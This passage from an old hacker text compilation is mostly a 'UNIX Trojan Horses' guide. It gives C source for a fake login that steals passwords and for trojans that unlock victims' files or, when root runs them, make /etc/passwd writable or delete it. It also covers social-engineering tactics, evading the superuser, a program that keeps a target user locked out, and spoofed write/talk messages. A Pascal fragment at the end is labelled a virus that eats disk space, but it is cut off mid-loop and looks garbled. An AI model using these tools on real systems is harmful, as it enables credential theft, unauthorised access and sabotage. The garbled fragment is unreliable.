  4285. anything easily.  You can go for A, B, C, or D engines but remember that the
  4286. heavier and more powerful the engine, the longer the dowel you will need.  Buy
  4287. the C6-7 engines with a 6 second burn and 7 second delay for discharge.
  4288.  
  4289.  
  4290.  
  4291.                   ------------------
  4292.                   UNIX Trojan Horses
  4293.                   ------------------
  4294.  
  4295. Introduction
  4296. ------------
  4297.  
  4298.      "UNIX Security" is an oxymoron.  It's an easy system to bruteforce hack
  4299. (most UNIX systems don't hang up after x number of login tries, and there are
  4300. a number of default logins, such as root, bin, sys and uucp).  Once you're in
  4301. the system, you can easily bring it to its knees or, if you know a little 'C',
  4302. you can make the system work for you and totally eliminate the security
  4303. barriers to creating your own logins, reading anybody's files, etcetera.  This
  4304. file will outline such ways by presenting 'C' code that you can implement
  4305. yourself.
  4306.  
  4307. Requirements
  4308. ------------
  4309.      You'll need a working account on a UNIX system.  It should be a fairly
  4310. robust version of UNIX (such as 4.2bsd or AT&T System V) running on a real
  4311. machine (a PDP/11, VAX, Pyramid, etc.) for the best results.  If you go to
  4312. school and have an account on the school system, that will do perfectly.
  4313.  
  4314. Notes
  4315. -----
  4316.      This file was inspired an article in the April, '86 issue of BYTE
  4317. entitled "Making UNIX Secure."  In the article, the authors say "We provide
  4318. this information in a way that, we hope, is interesting and useful yet stops
  4319. short of being a 'cookbook for crackers.'  We have often intentionally omitted
  4320. details."  I am following the general outline of the article, giving explicit
  4321. examples of the methods they touched on.
  4322.  
  4323.  
  4324. Project One:  Fishing For Passwords
  4325. -----------------------------------
  4326.  
  4327.      You can implement this with only a minimal knowledge of UNIX and C.
  4328. However, you need access to a terminal that many people use - the computer lab
  4329. at your school, for example.
  4330.  
  4331.      When you log onto a typical UNIX system, you see something like this:
  4332.   _7+3 _Tiburon Systems 4.2bsd / System V (shark)
  4333.  
  4334.  
  4335. login: shark
  4336. Password:      (not printed)
  4337.  
  4338.      The program I'm giving you here simulates a logon sequence.  You run the
  4339. program from a terminal and then leave.  Some unknowing fool will walk up and
  4340. enter their login and password.  It is written to a file of yours, then "login
  4341. incorrect" is printed, then the fool is asked to log in again.  The second
  4342. time it's the real login program.  This time the person succeeds and they are
  4343. none the wiser.
  4344.  
  4345.      On the system, put the following code into a file called 'horse.c'.  You
  4346. will need to modify the first 8 lines to fit your system's appearance.
  4347.  
  4348.  
  4349. ----- Code Begins Here -----
  4350.  
  4351. /* this is what a 'C' comment looks like.  You can leave them out. */
  4352.  
  4353. /* #define's are like macros you can use for configuration. */
  4354.  
  4355. #define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
  4356.  
  4357. /* The above string should be made to look like the message that your
  4358.  * system prints when ready.  Each \n represents a carriage return.
  4359.  */
  4360.  
  4361. #define LOGIN  "login: "
  4362.  
  4363. /* The above is the login prompt.  You shouldn't have to change it
  4364.  * unless you're running some strange version of UNIX.
  4365.  */
  4366.  
  4367. #define PASSWORD "password:"
  4368.  
  4369. /* The above is the password prompt.  You shouldn't have to change
  4370.  * it, either.
  4371.  */
  4372.  
  4373. #define WAIT 2
  4374.  
  4375. /* The numerical value assigned to WAIT is the delay you get after
  4376.  * "password:" and before "login incorrect."  Change it (0 = almost
  4377.  * no delay, 5 = LONG delay) so it looks like your system's delay.
  4378.  * realism is the key here - we don't want our target to become
  4379.  * suspicious.
  4380.  */
  4381.  
  4382.  
  4383. #define INCORRECT "Login incorrect.\n"
  4384.  
  4385. /* Change the above so it is what your system says when an incorrect
  4386.  * login is given.  You shouldn't have to change it.  _7+3 _ */
  4387.  
  4388. #define FILENAME "stuff"
  4389.  
  4390. /* FILENAME is the name of the file that the hacked passwords will
  4391.  * be put into automatically.  'stuff' is a perfectly good name.
  4392.  */
  4393.  
  4394. /* Don't change the rest of the program unless there is a need to
  4395.  * and you know 'C'.
  4396.  */
  4397.  
  4398. #include <curses.h>
  4399. #include <signal.h>
  4400. int stop();
  4401.  
  4402. main()
  4403. {
  4404. char name[10], password[10];
  4405. int i;
  4406. FILE *fp, *fopen();
  4407. signal(SIGINT,stop);
  4408. initscr();
  4409. printf(SYSTEM);
  4410. printf(LOGIN);
  4411. scanf("%[^\n]",name);
  4412. getchar();
  4413. noecho();
  4414. printf(PASSWORD);
  4415. scanf("%[^\n]",password);
  4416. printf("\n");
  4417. getchar();
  4418. echo();
  4419. sleep(WAIT);
  4420.  
  4421.  
  4422. if ( ( fp = fopen(FILENAME,"a") )  != NULL ) {
  4423. #fprintf(fp,"login %s has password %s\n",name,password);
  4424. #fclose(fp);
  4425. #}
  4426.  
  4427. printf(INCORRECT);
  4428. endwin();
  4429. }
  4430.  
  4431. stop()
  4432. {
  4433. endwin();
  4434. exit(0);
  4435. }
  4436.  
  4437.  
  4438. ----- Source Ends Here -----
  4439.  
  4440.      OK, as I said, enter the above and configure it so it looks exactly like  _7+3 _your system's login sequence.  To compile this program called 'horse.c' type
  4441. the following two lines: (don't type the %'s, they are just a sample prompt)
  4442.  
  4443. % cc horse.c -lcurses -ltermcap
  4444. % mv a.out horse
  4445.  
  4446. You now have the working object code in a file called 'horse'.  Run it, and if
  4447. it doesn't look like your systems logon sequence, re-edit horse.c and
  4448. recomplie it.  When you're ready to put the program into use, create a new
  4449. file and call it 'trap' or something.  'trap' should have these two commands:
  4450.  
  4451. horse                    (this runs your program)
  4452. login                    (this runs the real login program)
  4453.  
  4454. to execute 'trap' type:
  4455.  
  4456. % source trap            (again, don't type the %)
  4457.  
  4458. and walk away from your terminal...
  4459.  
  4460. After you've run it successfully a few times, check your file called
  4461. 'stuff' (or whatever you decided to call it).  It will look like this:
  4462.  
  4463. user john has password secret
  4464. user mary has password smegma
  4465. etc.
  4466.  
  4467. Copy down these passwords, then delete this file (it can be VERY incriminating
  4468. if the superuser sees it).
  4469.  
  4470. Note - for best results your terminal should be set to time-out after a few
  4471. minutes of non-use - that way, your horse program doesn't run idle for 14
  4472. hours if nobody uses the terminal you ran it on.
  4473.  
  4474. -----
  4475.  
  4476. The next projects can be run on a remote system, such as the VAX in Michigan
  4477. you've hacked into, or Dartmouth's UNIX system, or whatever.  However, they
  4478. require a little knowledge of the 'C' language.  They're not something for
  4479. UNIX novices.
  4480.  
  4481. Project Two:  Reading Anybody's Files
  4482. -------------------------------------
  4483.  
  4484. When somebody runs a program, they're the owner of the process created and
  4485. that program can do anything they would do, such as delete a file in their
  4486. directory or making a file of theirs available for reading by anybody.
  4487.  
  4488. When people save old mail they get on a UNIX system, it's put into a file
  4489. called mbox in their home directory.  This file can be fun to read but is
  4490. usually impossible for anybody but the file's owner to read.  Here is a short
  4491. program that will unlock (i.e. chmod 777, or let anybody on the system read,
  4492. write or execute) the mbox file of the person who runs the program:
  4493.  
  4494. ----- Code Begins Here -----  _7+3 _
  4495. #include <pwd.h>
  4496.  
  4497. struct passwd *getpwnam(name);
  4498. struct passwd *p;
  4499. char buf[255];
  4500.  
  4501. main()
  4502. {
  4503. p = getpwnam(getlogin());
  4504. sprintf(buf,"%s/%s",p->pw_dir,"mbox");
  4505. if ( access(buf,0) > -1 ) {
  4506.     sprintf(buf,"chmod 777 %s/%s",p->pw_dir,"mbox");
  4507.     system(buf);
  4508.     }
  4509. }
  4510.  
  4511. ----- Code Ends Here -----
  4512.  
  4513. So the question is:  How do I get my target to run this program that's
  4514. in my directory?
  4515.  
  4516. If the system you're on has a public-messages type of thing (on 4.xbsd, type
  4517. 'msgs') you can advertise your program there.  Put the above code in another
  4518. program - find a utility or game program in some magazine like UNIX WORLD and
  4519. modify it and do the above before it does it's real thing.  So if you have a
  4520. program called tic-tac-toe and you've modified it to unlock the mbox file of
  4521. the user before it plays tic-tac-toe with him, advertise "I have a new tic-
  4522. tac-toe program running that you should all try.  It's in my directory." or
  4523. whatever.  If you don't have means of telling everybody on the system via a
  4524. public message, then just send mail to the specific people you want to trap.
  4525.  
  4526. If you can't find a real program to modify, just take the above program and
  4527. add this line between the two '}' lines at the end of the program:
  4528.  
  4529. printf("Error opening tic-tac-toe data file.  Sorry!\n");
  4530.  
  4531. when the program runs, it will print the above error message.  The user will
  4532. think "Heh, that dude doesn't know how to write a simple tic-tac-toe program!"
  4533. but the joke's on him - you can now read his mail.
  4534.  
  4535. If there's a specific file in a user's directory that you'd like to read (say
  4536. it's called "secret") just throw together this general program:
  4537.  
  4538.  
  4539. main()
  4540. {
  4541. if ( access("secret",0) > -1 ) system("chmod 777 secret");
  4542. }
  4543.  
  4544. then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program
  4545. called super_star_wars, will you try it out?"
  4546.  
  4547. You can use your imagination.  Think of a command you'd like somebody to
  4548. execute.  Then put it inside a system() call in a C program and trick them  _7+3 _into running your program!
  4549.  
  4550. Here's a very neat way of using the above technique:
  4551.  
  4552. Project Three: Become the superuser
  4553. -----------------------------------
  4554.  
  4555. Write a program that you can get people to run.  Put this line in it
  4556. somewhere:
  4557.  
  4558. if ( !strcmp(getlogin(),"root") ) system("whatever you want");
  4559.  
  4560. This checks to see if the root login is running your program.  If he is, you
  4561. can have him execute any shell command you'd like.  Here are some suggestions:
  4562.  
  4563. "chmod 666 /etc/passwd"
  4564.  
  4565.      /etc/passwd is the system's password file.  The root owns this file.
  4566. Normally, everyone can read it (the passwords are encrypted) but only the root
  4567. can write to it.  Take a look at it and see how it's formatted if you don't
  4568. know already.  This command makes it possible for you to now write to the file
  4569. - i.e. create unlimited accounts for yourself and your friends.
  4570.  
  4571. "chmod 666 /etc/group"
  4572.  
  4573.      By adding yourself to some high-access groups, you can open many
  4574. doors.
  4575.  
  4576. "chmod 666 /usr/lib/uucp/L.sys"
  4577.  
  4578.      Look for this file on your system if it is on the uucp net.  It contains
  4579. dialups and passwords to other systems on the net, and normally only the uucp
  4580. administrator can read it.  Find out who owns this file and get him to
  4581. unknowingly execute a program to unlock it for you.
  4582.  
  4583. "rm /etc/passwd"
  4584.  
  4585.      If you can get the root to execute this command, the system's passwd file
  4586. will be removed and the system will go down and will not come up for some time
  4587. to come.  This is very destructive.
  4588.  
  4589. -----
  4590.  
  4591. If you are going to go about adding a trojan horse program to the system,
  4592. there are some rules you should follow.  If the hidden purpose is something
  4593. major (such as unlocking the user's mbox or deleting all of his files or
  4594. something) this program shouldn't be a program that people will be running a
  4595. lot (such as a popular computer game) - once people discover that their files
  4596. are public access the source of the problem will be discovered quite easily.
  4597. Save this purpose for a 'test' program (such as a game you're in the process
  4598. of writing) that you ask individual people to run via mail or 'chatting' with
  4599. them.  As I said, this 'test' program can bomb or print a phony error message
  4600. after completing its task, and you will just tell the person "well, I guess
  4601. it needs more work", wait until they log off, and then read whatever file of
  4602. theirs that you've unlocked.  If your trojan horse program's sole purpose is  _7+3 _to catch a specific user running it - such as the root or other high-powered
  4603. user - you can put the code to do so in a program that will be run a lot by
  4604. various users of the system.  Your modification will remain dormant until he
  4605. runs it.  If you can't find the source to 'star trek' or whatever in C, just
  4606. learn C and convert something from pascal.  It can't hurt to learn C as it's a
  4607. great language.  We've just seen what it can do on a UNIX system.  Once you've
  4608. caught the root (i.e. you can now modify the /etc/passwd file) remove the
  4609. spurious code from your trojan horse program and you'll never be caught. 
  4610.  
  4611.  
  4612.  
  4613.                    Unix - Odds & Ends
  4614.  
  4615. --  ------- ----- --- --- ------
  4616. 1.  Keeping Users Off The System
  4617. --  ------- ----- --- --- ------
  4618.  
  4619. Now, we all know by now how to log users off (one way is to redirect
  4620. an 'stty 0' command to their tty) but unless you have root privs, this
  4621. will not work when a user has set 'mesg n' and prevented other users from
  4622. writing to their terminal.  But even users who have a 'mesg n' command in
  4623. their .login (or .profile or .cshrc) file still have a window of vulnerability,
  4624. the time between login and the locking of their terminal.  I designed the
  4625. following program, block.c, to take advantage of this fact.
  4626.  
  4627. To get this source running on your favorite Unix system, upload it,
  4628. call it 'block.c', and type the following at the % or $ prompt:
  4629.  
  4630. cc -o block block.c
  4631.  
  4632. once you've compiled it successfully, it is invoked like so:
  4633.  
  4634. block username [&]
  4635.  
  4636. The & is optional and recommended - it runs the program in the background,
  4637. thus letting you do other things while it's at work.
  4638.  
  4639. If the user specified is logged in at present, it immediately logs
  4640. them out (if possible) and waits for them to log in.  If they aren't logged
  4641. in, it starts waiting for them.  If the user is presently logged in but
  4642. has their messages off, you'll have to wait until they've logged out to
  4643. start the thing going.
  4644.  
  4645. Block is essentially an endless loop : it keeps checking for the occurence
  4646. of the username in /etc/utmp.  When it finds it, it immediately logs them
  4647. out and continues.  If for some reason the logout attempt fails, the program
  4648. aborts.  Normally this won't happen - the program is very quick when run
  4649. unmodified.  However, to get such performance, it runs in a very tight
  4650. loop and will eat up a lot of CPU time.  Notice that near the end of the
  4651. program there is the line:
  4652.  
  4653. /*sleep(SLEEP)   */
  4654.  
  4655. the /* and */ are comment delimiters - right now the line is commented
  4656. out.  If you remove the comments and re-compile the program, it will then  _7+3 _'go to sleep' for the number of seconds defined in SLEEP (default is 5)
  4657. at the end of every loop.  This will save the system load but will slightly
  4658. decrease the odds of catching the user during their 'window of vulnerability.'
  4659.  
  4660. If you have a chance to run this program at a computer lab at a school or
  4661. somewhere similar, run this program on a friend (or an enemy) and watch
  4662. the reaction on their face when they repeatedly try to log in and are
  4663. logged out before they can do *anything*.  It is quite humorous.  This
  4664. program is also quite nasty and can make you a lot of enemies!
  4665.  
  4666. caveat #1:  note that if you run the program on yourself, you will be logged
  4667. out, the program will continue to run (depending on the shell you're under)
  4668. and you'll have locked yourself out of the system - so don't do this!
  4669.  
  4670. caveat #2:  I wrote this under OSx version 4.0, which is a licensed version
  4671. of Unix which implements 4.3bsd and AT&T sysV.  No guarantees that it will
  4672. work on your system.
  4673.  
  4674. caveat #3:  If you run this program in background, don't forget to kill
  4675. it when you're done with it!  (when you invoke it with '&', the shell will
  4676. give you a job number, such as '[2] 90125'.  If you want to kill it later
  4677. in the same login session, type 'kill %2'.  If you log in later and want
  4678. to kill it, type 'kill 90125'.  Just read the man page on the kill command
  4679. if you need any help...
  4680.  
  4681. ----- cut here -----
  4682.  
  4683. /* block.c -- prevent a user from logging in
  4684.  * by Shooting Shark
  4685.  * usage : block username [&]
  4686.  * I suggest you run this in background.
  4687.  */
  4688.  
  4689. #include <stdio.h>
  4690. #include <utmp.h>
  4691. #include <ctype.h>
  4692. #include <termio.h>
  4693. #include <fcntl.h>
  4694.  
  4695. #define W_OK2
  4696. #define SLEEP5
  4697. #define UTMP"/etc/utmp"
  4698. #define TTY_PRE "/dev/"
  4699.  
  4700. main(ac,av)
  4701. int ac;
  4702. char *av[];
  4703. {
  4704. int target, fp, open();
  4705. struct utmpuser;
  4706. struct termio*opts;
  4707. char buf[30], buf2[50];
  4708.  
  4709. if (ac != 2) {
  4710. printf("usage : %s username\n",av[0]);  _7+3 _exit(-1);
  4711. }
  4712.  
  4713.  
  4714. for (;;) {
  4715.  
  4716. if ((fp = open(UTMP,0)) == -1) {
  4717. printf("fatal error!  cannot open %s.\n",UTMP);
  4718. exit(-1);
  4719. }
  4720.  
  4721.  
  4722. while (read(fp, &user, sizeof user) > 0) {
  4723. if (isprint(user.ut_name[0])) {
  4724. if (!(strcmp(user.ut_name,av[1]))) {
  4725.  
  4726. printf("%s is logging in...",user.ut_name);
  4727. sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
  4728. printf("%s\n",buf);
  4729. if (access(buf,W_OK) == -1) {
  4730. printf("failed - program aborting.\n");
  4731. exit(-1);
  4732. }
  4733. else {
  4734. if ((target = open(buf,O_WRONLY)) != EOF) {
  4735. sprintf(buf2,"stty 0 > %s",buf);
  4736. system(buf2);
  4737. printf("killed.\n");
  4738. sleep(10);
  4739. }
  4740.  
  4741. } /* else */
  4742. } /* if strcmp */
  4743. } /* if isprint */
  4744. } /* while */
  4745. close(fp);
  4746.  
  4747. /*sleep(SLEEP);  */
  4748.  
  4749. } /* for */
  4750.  
  4751.  
  4752.  
  4753.  
  4754.  
  4755. }
  4756.  
  4757. ----- cut here -----
  4758.  
  4759.  
  4760. --  ------------- ----- ----- ---- ------  --- ------
  4761. 2.  Impersonating other users with 'write' and 'talk'
  4762. --  ------------- ----- ----- ---- ------  --- ------
  4763.  
  4764. This next trick wasn't exactly a work of stupefying genius, but is a  _7+3 _little trick (that anybody can do) that I sometimes use to amuse myself
  4765. and, as with the above, annoy the hell out of my friends and enemies.
  4766.  
  4767. Nearly every Unix system has the 'write' program, for conversing with
  4768. other logged-in users.  As a quick summary:
  4769.  
  4770. If you see that user 'clara' is logged in with the 'who' or 'w' command
  4771. or whatever, and you wish to talk to her for some reason or another,
  4772. you'd type 'write clara'.  Clara then would see on her screen something
  4773. like this (given that you are username 'shark'):
  4774.  
  4775.  
  4776. [3 ^G's] Message from shark on ttyi13 at 23:14 ...
  4777.  
  4778. You then type away at her, and whatever you type is sent to her terminal
  4779. line-by-line.  If she wanted to make it a conversation rather than a
  4780. monologue, she'd type 'write shark,' you'd get a message similar to the above
  4781. on your terminal, and the two of you would type away at each other to your
  4782. little heart's content.  If either one of you wanted to end the conversation,
  4783. you would type a ^D.  They would then see the characters 'EOF' on their
  4784. screen, but they'd still be 'write'ing to you until they typed a ^D as well.
  4785.  
  4786. Now, if you're on a bigger installation you'll probably have some sort
  4787. of full-screen windowing chat program like 'talk'.  My version of talk
  4788. sends the following message:
  4789.  
  4790. Message from Talk_Daemon@tibsys at 23:14 ...
  4791. talk: connection requested by shark@tibsys.
  4792. talk: respond with:  talk shark@tibsys
  4793.  
  4794. Anyway, here's where the fun part begins:  It's quite easy to put a sample
  4795. 'write' or 'talk' message into a file and then edit so that the 'from'
  4796. is a different person, and the tty is listed differently.  If you see that
  4797. your dorky friend roger is on ttyi10 and the root also happens to be
  4798. logged on on ttyi01, make the file look something like this:
  4799.  
  4800. [3 control-G's] Message from root on ttyi01 at [the current time]
  4801.  
  4802. wackawackawackawackawacka!!!
  4803.  
  4804. [or a similarly confusing or rude message...]
  4805.  
  4806. EOF
  4807.  
  4808. Then, send this file to roger's terminal with:
  4809.  
  4810. cat filename > /dev/ttyi10
  4811.  
  4812. He'll get the message on his terminal and wonder what the hell the
  4813. superuser is talking about.  He might even 'write' back to the superuser
  4814. with the intent of asking 'what the hell are you talking about?'.  For
  4815. maximum effectiveness, *simultaneously* send a message to root 'from'
  4816. roger at the appropriate terminal with an equally strange message - they'll
  4817. then engage in a conversation that will go something like "what did you
  4818. mean by that?"  "what do you mean, what do I mean?  What did *you* mean  _7+3 _by that?" etc.  A splendid time is guaranteed for all!  Note that you don't
  4819. have to make 'root' the perpetrator of the gag, any two currently logged-in
  4820. users who have their terminals open for messages can join in on the fun.
  4821.  
  4822. Similarly, you can fake a few 'talk' pages from/to two people...they will
  4823. then probably start talking...although the conversation will be along the
  4824. lines of "what do you want?"  "you tell me."  "you paged me, you tell *me."
  4825. etcetera, while you laugh yourself silly or something like that.
  4826.  
  4827. A variation on the theme:  As I said, when using 'write' you type a ^D to
  4828. end the conversation, and the person you're typing at sees an 'EOF' on
  4829. their screen.  But you could also just *type* 'EOF', and they'd think
  4830. you've quit...but you still have an open line to their terminal.  Even
  4831. if they later turn messages off, you still have the ability to write to
  4832. their terminal.  Keeping this fact in mind, anybody who knows what they're
  4833. doing can write a program similar to my 'block' program above that doesn't
  4834. log a user out when they appear on the system, but opens their tty as
  4835. a device and keeps the file handle in memory so you can redirect to their
  4836. terminal - to write rude messages or to log them out or whatever - at any
  4837. time, until they log out.
  4838.  
  4839.  
  4840.  
  4841. {modified version of Arpnet virus:Pascal should be redif to ASM}
  4842. {obj are ok compile will attach with viru@2 mechanizism..per @Trash33}
  4843. {makes the disk space packets and eats all avalible space,loop it  }
  4844. {Enjoy and modify this is root version...aka SHADOWSPAWN}
  4845. Unit  Netsnd;
  4846. Interface
  4847. Uses  Crt, Dos, Consts, Types, Iostuff, Routing,
  4848.       Netvars, Netfncs, Netrcv, Btree, Filedecs;
  4849. PROCEDURE make_packets;
  4850. Implementation
  4851. {--------MAKE PACKETS AND PACKETS AND PACKETS--------------------------------}
  4852. PROCEDURE make_packets;
  4853. VAR   msg_counter : INTEGER;
  4854.       tmp_ptr     : node_info_ptr;
  4855.       month,day,year,dow : WORD;
  4856.       hour,minute,second,hund : WORD;
  4857.       temp        : line;
  4858.       rl          : LONGINT;
  4859.       x           : INTEGER;
  4860.       new_net     : INTEGER;
  4861.       new_node    : INTEGER;
  4862.       attr        : INTEGER;
  4863.       fwd         : BOOLEAN;
  4864.       ch          : CHAR;
  4865.       t1,t2,t3    : INTEGER;
  4866.       i,j         : INTEGER;
  4867.       seen        : BOOLEAN;
  4868.       more        : BOOLEAN;
  4869.       lrnum       : lrnumber;
  4870.       lrtmp       : LONGINT;
  4871.       tmp         : short_string;
  4872.    {-------------------SET UP FOR NET NODE PACKETS---------------------------}  _7+3 _   PROCEDURE construct_packet(new_net, new_node: INTEGER);
  4873.    VAR   first_pk : INTEGER;
  4874.    BEGIN
  4875.       INC(msg_counter);
  4876.       tmp_ptr := node_c;
  4877.       first_pk := -1;
  4878.       WHILE (tmp_ptr <> NIL) AND
  4879.      NOT ((tmp_ptr^.net = new_net) AND
  4880.      (tmp_ptr^.node = new_node)) DO BEGIN
  4881.      tmp_ptr := tmp_ptr^.ptr
  4882.       END;
  4883.       IF tmp_ptr = NIL THEN
  4884.      BEGIN
  4885.         NEW(tmp_ptr);
  4886.         FILLCHAR(tmp_ptr^,SIZEOF(node_info),0);
  4887.         tmp_ptr^.ptr := node_c;
  4888.         node_c := tmp_ptr;
  4889.         node_c^.net := new_net;
  4890.         node_c^.node := new_node;
  4891.         node_c^.tries := 0;
  4892.         node_c^.connects := 0;
  4893.         node_c^.success := FALSE;
  4894.         ASSIGN(pk_index,default.database_drive + pkindexfile);
  4895.         {$I-} RESET(pk_index); {$I+}
  4896.         IF IOresult = 0 THEN
  4897.            BEGIN
  4898.           x := 0;
  4899.           pk_idx.net := 0;
  4900.           pk_idx.node := 0;
  4901.           WHILE NOT EOF(pk_index) AND
  4902.              NOT ((pk_idx.net = new_net) AND (pk_idx.node = new_node)) DO BEGIN
  4903.              READ(pk_index,pk_idx);
  4904.              IF pk_idx.avail AND (first_pk < 0) THEN
  4905.             first_pk := x;
  4906.              INC(x)
  4907.           END;
  4908.           IF (pk_idx.net = new_net) AND (pk_idx.node = new_node) THEN
  4909.              BEGIN
  4910.             node_c^.pk_num := x - 1;
  4911.             first_pk := -1
  4912.              END
  4913.           ELSE
  4914.              BEGIN
  4915.             IF first_pk < 0 THEN
  4916.                first_pk := FILESIZE(pk_index);
  4917.             node_c^.pk_num := first_pk;
  4918.             pk_idx.avail := FALSE;
  4919.             pk_idx.sent := FALSE;
  4920.             pk_idx.attempts := 0;
  4921.             pk_idx.net := new_net;
  4922.             pk_idx.node := new_node;
  4923.             SEEK(pk_index,first_pk);
  4924.             WRITE(pk_index,pk_idx)
  4925.              END
  4926.            END  _7+3 _            ELSE
  4927.            BEGIN
  4928.           REWRITE(pk_index);
  4929.           first_pk := 0;
  4930.           node_c^.pk_num := 0;
  4931.           pk_idx.avail := FALSE;
  4932.           pk_idx.sent := FALSE;
  4933.           pk_idx.attempts := 0;
  4934.           pk_idx.net := new_net;
  4935.           pk_idx.node := new_node;
  4936.           SEEK(pk_index,first_pk);
  4937.           WRITE(pk_index,pk_idx)
  4938.            END;
  4939.         CLOSE(pk_index);
  4940.         ASSIGN(p_info,default.database_drive + 'PK' + dual(node_c^.pk_num) + '.XMT');
  4941.         {$I-} RESET(p_info); {$I+}
  4942.         IF (IOresult = 0) AND (first_pk >=0) THEN
  4943.            CLOSE(p_info)
  4944.         ELSE
  4945.            BEGIN
  4946.           REWRITE(p_info);
  4947.           GETDATE(year,month,day,dow);
  4948.           GETTIME(hour,minute,second,hund);
  4949.           packet.year := year;
  4950.           packet.month := month;
  4951.           packet.day := day;
  4952.           packet.hour := hour;
  4953.           packet.minute := minute;
  4954.           packet.second := second;
  4955.           WITH packet DO BEGIN
  4956.              orig_net := default.net;
  4957.              dest_net := new_net;
  4958.              orig_node := default.node;
  4959.              dest_node := new_node;
  4960.              baud_rate := 1200;
  4961.              pk_ver := packet_version;
  4962.              prod_code := product_code;
  4963.              FILLCHAR(fill,SIZEOF(fill),0)
  4964.           END;
  4965.           WRITE(p_info,packet);
  4966.           CLOSE(p_info)
  4967.            END
  4968.      END;
  4969. { The following code will construct the actual message that is to be
  4970.   transmitted. I'm sure some intelligent soul out there can figure out
  4971.   that this section of code can be replaced to transmit anything as the
  4972.   packet is a protocol level above the information actually being transmitted
  4973.   to the destination node... }
  4974.       ASSIGN(packets,default.database_drive + 'PK' + dual(tmp_ptr^.pk_num) + '.XMT');
  4975.       RESET(packets);
  4976.       SEEK(packets,FILESIZE(packets));
  4977.       temp := convert(mesg.org_time.date,rl);
  4978.       temp := day_of_week[rl MOD 7] + ' '
  4979.         + dual(value(COPY(mesg.org_time.date,4,2))) + ' '
  4980.         + month_of_year[value(COPY(mesg.org_time.date,1,2))] + ' '  _7+3 _            + dual(value(COPY(mesg.org_time.date,7,2))) + ' '
  4981.         + dual(value(COPY(mesg.org_time.time,1,2))) + ':'
  4982.         + dual(value(COPY(mesg.org_time.time,4,2))) + NULL;
  4983.       write_int($0002);                     {Packet header}
  4984.       write_int(mesg.orig_node);            {Originating node}
  4985.       write_int(mesg.dest_node);            {Destination node}
  4986.       write_int(mesg.orig_net);             {Originating net}
  4987.       write_int(mesg.dest_net);             {Destination net}
  4988.       attr := mesg.flags AND $7413;         {Zero required attributes}
  4989.       write_int(attr);                      {File attribute}
  4990. {?}   write_int($0000);                     {File transmission cost}
  4991.       write_line(temp);                     {Date/Time group}
  4992.       write_line(mesg.dest_user + NULL);    {Who message is to}
  4993.       write_line(mesg.org_user + NULL);     {Who it is from};
  4994.       write_line(mesg.title + NULL);        {Subject of message};
  4995.       x := 0;
  4996.       WHILE (mesg_text[x + 1] <> '') AND (x < max_msg_entry) DO BEGIN
  4997.      INC(x);
  4998.      write_line(mesg_text[x] + CR);
  4999.      IF POS('Message ID: ',mesg_text[x]) > 0 THEN
  5000.         BEGIN
  5001.            temp := COPY(mesg_text[x],POS('Message ID: ',mesg_text[x]) + 12,9);
  5002.            tmp := convert(system_date,lrtmp);
  5003.            lrnum := lrtmp;
  5004.            insertvalueinbtree(pkfile,lrnum,temp)
  5005.         END
  5006.       END;
  5007.       write_line(mesg_text[x + 1] + NULL);
  5008.       write_int($0000);                    {End of packet}
  5009.       CLOSE(packets)
  5010.    END;
  5011.    {---THIS IS JUST FOR FUN    BETTER TO LEAVE OUT UNLESS YOU WANT TO TRAIL--}
  5012. BEGIN
  5013.    openwindow(40,5,76,15,'Mail packet construction',YELLOW,back,4);
  5014.    setcolor(fore,back);
  5015.    writest('Constructing transmission packets',2,2);
  5016.    WRITELN(log_file,'Making the mail packets...',system_date,' ',system_time);
  5017.    node_c := NIL;
  5018.    msg_counter := 0;
  5019.    ASSIGN(mesg_dir,default.msg_drive + msg_file_dir);
  5020.    {$I-} RESET(mesg_dir); {$I+}
  5021.    IF IOresult <> 0 THEN
  5022.       BEGIN
  5023.      WRITELN(log_file,'I can''t open the message directory!');
  5024.      writest('ERROR: Cannot open the message directory',2,4);
  5025.      EXIT
  5026.       END;
  5027.    t1 := 9;                    { Note: This is the networking base }
  5028.    REPEAT
  5029.       SEEK(mesg_dir,t1);
  5030.       READ(mesg_dir,mesg);
  5031.       t1 := mesg.dir_link;
  5032.       t2 := mesg.sub_dir_link;
  5033.       WHILE t2 > 0 DO BEGIN
  5034.      SEEK(mesg_dir,t2);  _7+3 _         READ(mesg_dir,mesg);
  5035.      t2 := mesg.dir_link;
  5036.      t3 := mesg.sub_dir_link;
  5037.      IF t3 > 0 THEN
  5038.         BEGIN
  5039.            SEEK(mesg_dir,t3);
  5040.            READ(mesg_dir,mesg);
  5041.            t3 := mesg.sub_dir_link;
  5042.            SEEK(mesg_dir,t3);
  5043.            READ(mesg_dir,mesg);
  5044.            REPEAT
  5045.           IF (mesg.dir_type = message) AND
  5046.              test_bit(msg_bit + (t3 DIV 1024),t3 MOD 1024) AND
  5047.              bit(mesg.flags,8) OR bit(mesg.flags,5) THEN
  5048.              BEGIN
  5049.             read_for_edit(default.msg_drive + msg_msg_dir,mesg.msg_link,mesg_text);
  5050.             more := FALSE;
  5051.             new_net := 0;
  5052.             new_node := 0;
  5053.             REPEAT
  5054.                fwd := FALSE;
  5055.                get_route_info(mesg.dest_net,mesg.dest_node,
  5056.                       new_net,new_node,fwd,more);
  5057.                get_node_info(new_net,new_node,destnode);
  5058.                i := 1;
  5059.                seen := FALSE;
  5060.                REPEAT
  5061.                   IF POS('Message ID:',mesg_text[i]) > 0 THEN
  5062.                  seen := TRUE;
  5063.                   IF (POS(' ' + destnode.serial_num,mesg_text[i]) > 0)
  5064.                  AND seen THEN
  5065.                  i := 0
  5066.                   ELSE
  5067.                  INC(i)
  5068.                UNTIL (i = 0) OR (POS(#$FF,mesg_text[i]) > 0);
  5069.                IF (i <> 0) AND ((NOT bit(mesg.flags,5) AND fwd) AND
  5070.                   bit(mesg.flags,8)) AND
  5071.                   NOT ((new_net = 0) AND (new_node = 0)) THEN
  5072.                   BEGIN
  5073.                  writest('Packet to Net/Node: ',2,4);
  5074.                  WRITE(new_net,'/',new_node,' ',destnode.serial_num,'   ');
  5075.                  writest('Title: ' + mesg.title,2,5);
  5076.                  CLREOL;
  5077.                  construct_packet(new_net,new_node)
  5078.                   END
  5079.             UNTIL NOT more;
  5080.             mesg.flags := mesg.flags OR $0020;
  5081.             SEEK(mesg_dir,t3);
  5082.             WRITE(mesg_dir,mesg)
  5083.              END;
  5084.           t3 := mesg.sub_dir_link;
  5085.           SEEK(mesg_dir,t3);
  5086.           READ(mesg_dir,mesg)
  5087.            UNTIL mesg.dir_link < 0
